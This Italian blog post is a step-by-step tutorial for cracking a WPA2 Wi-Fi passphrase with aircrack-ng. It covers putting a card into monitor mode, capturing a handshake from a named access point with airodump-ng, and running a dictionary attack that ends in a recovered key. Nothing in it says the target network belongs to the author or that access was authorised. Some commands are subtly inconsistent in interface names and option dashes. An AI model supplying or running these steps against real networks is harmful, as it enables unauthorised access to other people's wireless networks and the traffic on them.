Senza categoria

Craccare una chiave wpa2 con linux

giuda di killahop

Posto questa breve guida, per craccare una chiave wpa2 con un

dizionario e aircrack e linux
Installaimo aircrack-ng

sudo apt-get install aircrack-ng

procuriamoci il mac address della nostra scheda di rete
apriamo un terminale e digitiamo

ifconfig

individuiamo la scheda wifi, nel mio caso è ath0 e vediamo il valore del campo HWaddr, quello è il mac address della nostra scheda, nel mio caso è ” HWaddr 00:15:af:6b:fe:ca “.

poi ci servono un po di indormazioni sull access point: il mac address , il canale, il BSSID e l’ ESSID tutti reperibili da un

iwlist scan
…. magari da superuser.
copiamotutto il materiale in un file di testo, io ho fatto cosi…
mia interfaccia : ath0

mio mac : 00:15:af:6b:fe:ca

BSSID : 00:1C:F0:5D:34:B9

ESSID : PlaynationOnAir

canale : 1

Iniziamo:
Tutto verra eseguito da superuser….
sudo su
stoppiamo la nostra scheda wifi:

airmon-ng stop ath0
il sistema rispondera cosi:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
dopodichè la avviamo in monitor mode:

airmon-ng start wifi0

nota abbiamo avviato la nostra scheda di rete “ath0″ ma usando airmon dobbiamo usare il suffisso “wifi0″
il sistema rispondera cosi:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath1 Atheros madwifi-ng VAP (parent: wifi0)
ath2 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Ora dobbiamo avviare airodump per catturare un handshake, cioe una stretta di mano tra l’access point ed un client che si connette ad esso.
la sintassi e la seguente:

airodump-ng -c 1 –bssid 00:1C:F0:5D:34:B9 -w psk ath0

dove:
-c è il canale dell ap
–bssid è il mac address del ap
ath0 è la nostra scheda wifi
la situazione apparira cosi:

CH 1 ] [ Elapsed: 8 s ] [ 2008-11-22 12:05

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1C:F0:5D:34:B9 64 100 94 0 0 1 54. WPA2 TKIP PSK PlaynationOnAir

BSSID STATION PWR Rate Lost Packets Probes

ora vedremo che la schermata si pulira e airodup iniziera a catturare informazioni dal acces point sul canale 1 salvando le informazioni nel file chiamato psk
ora dobbiamo aspettare che che qualche client si autentica sull access point
e quando si collega vediamo che sulla schermata del airodump esce una scritta ” WPA handshake: 00:1C:F0:5D:34:B9 ”

vuol dire che il client con mac address 00:1C:F0:5D:34:B9 si è autenticato sul access point.

ora dobbiamo craccare la chiave con aircrack
la sintassi è la seguente:

aircrack-ng -w password.lst -b 00:1C:F0:5D:34:B9 psk*.cap

dove
-w è il nome del dizinario da eseguire
-b è il mac address del ap
con psk*.cap diciamo ad aircrack di sfogliare tra tutti i file che hanno estensione .cap di trovare l’handshake, serve per il bruteforce.
e avremo la seguente schermata:

KEY FOUND! [ evvivalafica ]

Master Key : D8 94 69 73 EA 5B 13 08 31 4E F7 62 D4 F4 3F FB
F2 7A C1 4F 22 A8 A6 8E 4D B7 94 61 71 88 D2 A0

Transcient Key : B9 44 D0 FB FA DE 0A 42 25 C1 B8 DC 1E FD D7 8C
97 C2 12 78 35 28 56 BA 88 06 4A 53 C3 75 AD D3
56 3A 5A 83 FA C3 EF 3F A1 74 21 6B 42 A6 5C 6A
B5 53 89 3B 04 7F 08 0A 27 92 E3 E1 33 8B 1F EB

EAPOL HMAC : 44 06 D9 82 DC C9 D0 22 A9 FE 3C 48 76 55 66 44

abbiamo trovato la chiave: evvivalafica

BELLISSIMA GUIDA E FACILE…GRANDE killahop..

Lascia un commento